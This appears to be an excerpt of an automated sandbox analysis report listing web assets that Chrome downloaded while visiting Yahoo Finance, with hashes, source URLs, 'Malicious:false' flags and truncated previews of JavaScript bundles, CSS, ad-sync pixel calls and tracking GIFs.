                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:27E0A461EF1C5281C43AF95F2C333D1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:CB0E02CCAB6E61D7F3178785825F84D34A0A9F16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E0C3F2F92332679D0089AF1E51A84ACED3E0693EE8EA3D88AA041B58870FD951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:779FE22DB90B60E4BBF49306E8ABD12F604081BD4059D8045D47F49907DFFA0A8C4A05E2A8642AD4D322D9A1FE9BC6E78D3D324F547D02EB9892DAF253889499
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var Ct={},q={};q.byteLength=Lt;q.toByteArray=Mt;q.fromByteArray=Pt;var k=[],R=[],kt=typeof Uint8Array<"u"?Uint8Array:Array,H="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(var D=0,St=H.length;D<St;++D)k[D]=H[D],R[H.charCodeAt(D)]=D;R[45]=62;R[95]=63;function lt(c){var p=c.length;if(p%4>0)throw new Error("Invalid string. Length must be a multiple of 4");var a=c.indexOf("=");a===-1&&(a=p);var w=a===p?0:4-a%4;return[a,w]}function Lt(c){var p=lt(c),a=p[0],w=p[1];return(a+w)*3/4-w}function _t(c,p,a){return(p+a)*3/4-a}function Mt(c){var p,a=lt(c),w=a[0],y=a[1],f=new kt(_t(c,w,y)),h=0,o=y>0?w-4:w,x;for(x=0;x<o;x+=4)p=R[c.charCodeAt(x)]<<18|R[c.charCodeAt(x+1)]<<12|R[c.charCodeAt(x+2)]<<6|R[c.charCodeAt(x+3)],f[h++]=p>>16&255,f[h++]=p>>8&255,f[h++]=p&255;return y===2&&(p=R[c.charCodeAt(x)]<<2|R[c.charCodeAt(x+1)]>>4,f[h++]=p&255),y===1&&(p=R[c.charCodeAt(x)]<<10|R[c.charCodeAt(x+1)]<<4|R[c.charCodeAt(x+2)]>>2,f[h++]=p>>8&255,f[h++]=p&255),f}function Nt(c){return k[c>>18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (6920)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6977
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.304390897076139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:pBOd5/nMyJzgyQ2j6kXxJuA7DiATYLag8UiktdknHK6erTjq:v4BMyynZAPeugPiktUH3aq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5BF8B7A66F295BD1080E758B54172A28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A0364527A9853F7066A7D1910843EAE5DEFD06E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B3C8B33FEBAD0971AC8282970D0DF393268F1B0714AB93522707785EF0898B2D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4FE0E251B48BEEC8C9DD97A6E82B3C846E8276CACD5DA6F0B82DA227FAAEE8F0B4BAD9F3D6EB551E7F344F67E14FEB59AB4875BC7274BE5BFB92C857FED3E248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/registration/tags/v1.46.0/registration-logout-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunkregistration=self.webpackChunkregistration||[]).push([[452],{4788:(e,t,r)=>{r.d(t,{c:()=>p});var n=r(1528),o=r(3248),c=r.n(o),a=r(3032),i=r.n(a),s=r(6012),u=r(6360);const p=(0,n.c)(c().mark((function e(){var t,r,n,o,a;return c().wrap((function(e){for(;;)switch(e.prev=e.next){case 0:return e.next=2,i().getAsyncToken();case 2:return t=e.sent,r=t.networkId,e.next=6,(0,s.cp)("me/network-token/".concat(r),{method:"POST",body:JSON.stringify({spot_id:u.kX})});case 6:return n=e.sent,o=n.network_id,a=n.token,i().setToken(a,o),e.abrupt("return",{token:a});case 11:case"end":return e.stop()}}),e)})))},1948:(e,t,r)=>{r.r(t),r.d(t,{LoginMethod:()=>n,default:()=>w});var n,o=r(1528),c=r(3248),a=r.n(c),i=r(3032),s=r.n(i),u=r(7496),p=r.n(u),d=r(3880),l=r(6012),f=r(2016),g=r(6360),m=r(7200),v=r(8904);!function(e){e.SSO="sso",e.LOGIN="login",e.SIGNUP="signup"}(n||(n={}));const w=function(){var e=(0,o.c)(a().mark((function e(t,r){var n,o,c,u,w;return a().wrap((function(e){for
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2321), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2321
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.6406104946897635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:CPTNrZUlRSyN32BqW2Bqhy2BqKXsGJAbjhBS5kES3:CrNreTxN32BqW2Bqhy2Bq4syAbFBS5kv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:282AACC911E5D3EF6093BB3023576BE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:87FB7877EF216EC871A32C5710717BDEAA2DBACB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5BBB9EF60CA006567C0E3965F46EAA9BBAC0816C526754C920EAD921B9F438F4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3120DD52F98DCDD83B263AB389320E8FB3035294A605FE1A712A805113100A3D58E0D75659A86E187B31B43B96F4F3359EC08107AA415DEE97533781235E3007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=56135341&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncImagePixel('https://sync.crwdcntrl.net/qmap?c=240&tp=PUBM&tpid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cr.frontend.weborama.fr/cr?key=pubmatic&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://mwzeom.zeotap.com/mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=176682A8-E121-44A7-818D-4FE53D542BB2');PubMatic.loadAsyncImagePixel('https://uipglob.semasio.net/pubmatic/1/info?sType=sync&sExtCookieId=176682A8-E121-44A7-818D-4FE53D542BB2&sInitiator=external&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_hm=MTc2NjgyQTgtRTEyMS00NEE3LTgxOEQtNEZFNTNENTQyQkIy&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_cm&google_sc&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://um.simpli.fi/pubmatic?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9O
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4783), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.326437052546915
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:iVgbSf3qpkb6DsOsOaK81sg8euSws8dNB1n:iVgbrV3jfn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1D44A92CE88F1DF1CCB0DCECFF203BBD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:774F4525375B0F267FD95AD7B70971E68DA93867
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6AF381612ADBC8A9197A8E700A34C94ABE63BAC6B302498AC7B7499F3B1DDC2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:645FE64FDD24D87F76034E02AE0B6A01FF2CBF2E397454D073DB744CD6970A0DAA6E54A39E0DEB64AD4E321FDFC2DE281B20F38A0DB478EE35C26BD016FE853C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.ShoppingContent.atomic.ltr.1d44a92ce88f1df1ccb0dcecff203bbd.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bds\(s\){border-style:solid}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdrs\(50\%\){border-radius:50%}#atomic .Bdrs\(80px\){border-radius:80px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bg\(\$shopping-caption-cont\){background:rgba(#7e1fff,.7);background:rgba(var(--hulk-pants),.7)}#atomic .Bgc\(--midnight\){background-color:#101518;background-color:var(--midnight)}#atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Bxsh\(\$panelShadow\){box-shadow:0 2px 6px 0 rgba(0,0,0,.2)}.ad-content:hover .ad-content\:h_C\(\$streamBrandHoverClass\){color:#7e1fff!important;color:var(--hulk-pants)!important}#atomic .C\(--batcave\){color:#232a31;color:var(--batcave)}#atomic .C\(--inkwell\){color:#1d2228;color:var(--inkwell)}#atomic .C\(--malibu\){color:#ff0080;color:var(--malibu)}#atomic .C\(--white\){color:#fff;color:var(--white)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):169726
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.788242372669673
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:T2HdALSWdG78KI4NBT0pfXle5jWlYoRl96678fGoUu:qHdALSAG78KI4NBT0L4jWlYoL9N78fGC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:073DE161887BB568D8713A48A005AF55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5962E4A0162E01365A36CE408B8982A1526DA133
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:98F1EC941E42E35B03119D52D344D074DE77855E482C0097B0D158CC033BD025
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8E3FE52E6918860B6A1A11FF54103027BC8B1AFDB262A1CE02392122EFABF7B349185860C7A1DEDF94C1EA7FAC44D99624D9CCEF3C64113E2142E8EB5E676D6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1845)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.355578659893664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:eyPEtdaLJKeIlMDT08lh7AfGRp7JBDiXalMDww1q/jUB+oHTMP/:Gt0LJKexTnlme7PcfJ+jP/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AA6895531D52CAA614BD29B922E4976C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:98997C23B4A02DB21A48D4C24D26B365C113D21C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:982CC66231797D6605F860E3D9ADE3602FF6DF8ED059537C1FAE6D60EB99D69A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:23653F236E8FA4B5F2611820FE755A7072731069ECFB60BE4A8FE2F79D9B793513FE1390EE0790F33F2A1B065D2E8B1AECFC41FDD79F73C9CEDC0C89DE322070
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/TopicPill.Bx-1k_kI.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as k,c as g,A as b,e as E,d as v,f as I,i as _,B as d,L as m,k as M,u as N,g as S,a as A}from"./scheduler.Dsuh-FKt.js";import{S as T,i as q,t as y,a as B}from"./index.CvwOawEI.js";import{g as C}from"./spread.CgU5AtxT.js";import{g as h}from"./i13nUtil.8E8_gCdn.js";function D(n){let t,f,u,s;const r=n[7].default,l=g(r,n,n[6],null);let c=[{class:f="topic-link "+n[1]},{"data-testid":n[5]},{href:n[2]},{title:n[3]},n[4]?{"data-sveltekit-reload":""}:{},{"data-ylk":u=h({elm:"navcat",elmt:"link",itc:0,sec:"topics",subsec:"block",...n[0]})}],o={};for(let e=0;e<c.length;e+=1)o=b(o,c[e]);return{c(){t=E("a"),l&&l.c(),this.h()},l(e){t=v(e,"A",{class:!0,"data-testid":!0,href:!0,title:!0,"data-ylk":!0});var a=I(t);l&&l.l(a),a.forEach(_),this.h()},h(){d(t,o),m(t,"yf-nhs2sl",!0)},m(e,a){M(e,t,a),l&&l.m(t,null),s=!0},p(e,[a]){l&&l.p&&(!s||a&64)&&N(l,r,e,e[6],s?A(r,e[6],a,null):S(e[6]),null),d(t,o=C(c,[(!s||a&2&&f!==(f="topic-link "+e[1]))&&{class:f},(!s||a&32)&&{"data-testid":e[5]},(!s||a&4)&&{hr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (31106), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):31106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.361464146008299
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:38TRU0Ons3ngHlPN+cWIuiBnvuLONVVHvekir8tuQF9tYs7XOtdX31kgN8I1+pU9:EiYIjv752FWNDI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1D44A2285A5CF3F758FA577A3D1FD6E8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:02B0D2257D2D2EA081EEC7850984191646C6F1E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A9FDA73E84014B72D0ACBCCAAEC736F65AB1F490121D2F484FCE09DB52346801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EA5AF70F6A6F2456F87BDC999A5B38680D5E2BBB9F1050A38B625C617B952B3234B044470ECD5D8593EC255FF54E1A28BF4525392B7B503C08C1FF2200816525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/launcher/tags/v3.23.0/launcher/initial-bundle.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(self.webpackChunk_spotim_launcher=self.webpackChunk_spotim_launcher||[]).push([[403],{3620:(t,e,n)=>{"use strict";Object.defineProperty(e,"__esModule",{value:!0});var o=n(80648);function i(t){var e=t.element,n=t.onAttributesChanged;e&&MutationObserver&&new MutationObserver((function(t){var e=t.filter((function(t){return"attributes"===t.type&&t.attributeName}));if(e.length>0){var o,i=null==(o=e.find((function(t){return t.target})))?void 0:o.target;null==n||n(i,e)}})).observe(e,{attributes:!0})}function s(t){var e=t.element,n=t.onRemoved;e&&MutationObserver&&e.parentNode&&new MutationObserver((function(t,o){t.some((function(t){return Array.from(t.removedNodes).indexOf(e)>-1}))&&(n(t[0].removedNodes[0]),o.disconnect())})).observe(e.parentNode,{childList:!0})}e.exposeAnimationEvents=function(t,e){void 0===e&&(e={}),t&&t.shadowRoot&&t.shadowRoot.addEventListener("animationstart",(function(t){var n;if(!t.detail||!t.detail.isSpotimReEmittedEvent){var o=new(function(t){var e;if(!t.defensiveMo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0241026136709444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUmExltxlNXE:JQ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4682377DDFBE4E7DABFDDB2E543E842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:328E472721A93345801ED5533240EAC2D1F8498C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D8BA81D1B60A18707722A1F2B62DAD48A6ACCED95A1933F49A68B5016620B93
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:202612457D9042FE853DAAB3DDCC1F0F960C5FFDBE8462FA435713E4D1D85FF0C3F197DAF8DBA15BDA9F5266D7E1F9ECAEEE045CBC156A4892D2F931FE6FA1BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........2.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (42665)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):98740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221261778902006
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:/s0IBMb8gA5mzuPdkz6P+QcyU+z9gaeaU9bgkg2dyMD:omz8kz6P+QPAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C5EA30A8527BC4B873461B3590BF88D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6E339BFBE9FED1CC7D4C316A80CED8D53E92803A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1B66E142C33D638D606EB6C6451401F88B68890B75468BBDE8886687FFCD09B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:095D7B7B01BEB5AEF2CBE68817D73A8F741D360D71E1209FBADC2CF77020F136745B204F58CC49B68BBB30A68995D8A857E2C202AE2B1C5C260F23179A3F11C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/entry/app.DopQX_fN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const __vite__fileDeps=["../nodes/0.B0UP-sbn.js","../chunks/scheduler.Dsuh-FKt.js","../chunks/index.CvwOawEI.js","../nodes/1.BvZHEcz2.js","../chunks/stores.BCwnb1-k.js","../chunks/43.BgWy8GOF.js","../chunks/control.CYgJF_JY.js","../nodes/2.CK7MWYuc.js","../chunks/commonUtil.BWwawKjd.js","../chunks/PageProgressBar.D-6_6JJN.js","../chunks/ads.DhuB_mth.js","../chunks/preload-helper.D6kgxu3v.js","../chunks/globals.D0QH3NT1.js","../chunks/i13nUtil.8E8_gCdn.js","../chunks/index.rV6zwFgL.js","../chunks/each.CI2tb2RB.js","../chunks/spread.CgU5AtxT.js","../assets/PageProgressBar.BUmOb2ZZ.css","../chunks/Ads.t43t7gLT.js","../chunks/AdGroup.B9K-yuAc.js","../chunks/intersectUtil.DVqOQxux.js","../chunks/context.Bt1NApa8.js","../assets/AdGroup.BvlaXdca.css","../chunks/Header.Cq72aaJC.js","../chunks/RMP.G38kzltP.js","../assets/Header.BvCA0Mhu.css","../chunks/Link.vSNQugO0.js","../chunks/Icon.C8w5V9EK.js","../assets/Icon.DgFg0-NP.css","../assets/Link.CHR7GGSC.css","../assets/2.DPu3nbOv.css","../nodes/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3413)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3414
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.041510985953786
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:1uNXz7zX+xbap+XXhXdSv51SRSWTcXA/oXOvNXGoXOBXvrCXBXrIXR+X1XlXfmXu:1A0ap6ZHrMrT74pZWk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:151FF715EB58D33BDFC2EC4D54880FA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92B4A379A0AEC9CFEACEA30A2338318CE9DBA01F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:38570FC57F200F8E08ECD98D2F5FF8890E411A1CB1FD7A2D28DAB1BBA2DBF528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3792F359FC6357F8FC24672A182F0AF189DBD826CC4665C79BF52F1AC56418424AE339DCFBBA282E034C531E39EAE828DFAF12A7C9035EC18C42D3F80BE7C38E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/AddToFollowing.Cg_49_NO.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.content.yf-1whqbcv.yf-1whqbcv{min-width:250px;max-width:270px;background-color:var(--surface1)}.signedOut.yf-1whqbcv.yf-1whqbcv{text-align:center;padding:var(--space-4)}.signedOut.yf-1whqbcv .signOutMsg.yf-1whqbcv{margin-left:var(--space-7);margin-right:var(--space-7);margin-bottom:var(--space-4);padding:0;font-size:var(--font-m);font-weight:var(--font-bold);text-align:center}.createBtn.yf-1whqbcv.yf-1whqbcv{display:inline-flex;padding-top:var(--space-4)}.pfList.yf-1whqbcv.yf-1whqbcv{list-style:none;margin:0;padding:0;text-align:left}.pfList.yf-1whqbcv .item.yf-1whqbcv .pf-item-btn{width:100%;white-space:nowrap;display:inline-flex;justify-content:flex-start;align-items:center;overflow:hidden;text-overflow:ellipsis;text-align:left;padding:.625rem 1.25rem;border:0}.pfList.yf-1whqbcv .item.yf-1whqbcv .pf-item-btn:focus{color:var(--text1)}.pfList.yf-1whqbcv .item.yf-1whqbcv .pf-item-btn:hover{color:var(--text1);background-color:var(--surface4)}.create.yf-1whqbcv.yf-1whqbcv{padding:var(--s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2300)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.319919047219747
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:aWPJa/nJA+8CjMIwzVJh+BF8ySlJUE8+bP7KMchIPoySEmZV3Sya:aWPJa/Jnp2zvh+BFZgUEpbmMEGoumM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BDC324150050C7C11A610327781C2006
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8C01111923E67D2F5385029C57807C73A53FC246
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F616EF28BEFC9584304F03A52DF4F203669E03067A23FA3371C4C029B4465097
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0D9E8284E12A06969C99872CF0CCDAC8762B68BA4E24D4DA36BB561DFECA638B4007F4F01DB836DD5F00AAD2504B2949A170E9551D8E7DBC4F0A014B252FB4FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
